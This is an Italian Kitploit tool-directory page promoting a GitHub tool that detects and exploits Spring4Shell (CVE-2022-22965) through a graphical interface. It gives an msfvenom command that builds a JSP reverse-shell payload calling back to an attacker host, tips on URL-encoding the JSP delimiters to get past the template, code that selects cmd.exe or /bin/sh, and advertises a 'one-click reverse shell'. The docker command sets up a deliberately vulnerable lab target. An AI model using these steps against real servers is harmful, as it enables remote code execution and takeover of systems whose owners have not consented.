Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Fast-CVE-2022-22965 — CVE-2022-22965 strumento di rilevamento grafico | Kitploit
Strumenti/GitHubGitHub/iloveflag/fast-cve-2022-22965
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubiloveflag/fast-cve-2022-22965

Fast-CVE-2022-22965

CVE-2022-22965 strumento di rilevamento grafico

Vedi Repository
43 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Target

root@kitploit:~
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest

La reverse shell si basa essenzialmente su msfvenom

root@kitploit:~
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp

Dopo aver codificato il JSP in URL, utilizzare

root@kitploit:~
%3C%25 sostituisce %25%7Bc2%7Di rappresenta <%
%25%3E sostituisce %25%7Bsuffix%7Di rappresenta %>

Il codice modifica il shellpath in base al tipo di server:

root@kitploit:~
if self.radioButton_win.isChecked():
    shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
    shellpath = "/bin/sh"

Esecuzione del comando: Rilevamento whoami: Reverse shell con un clic

Scarica lo strumento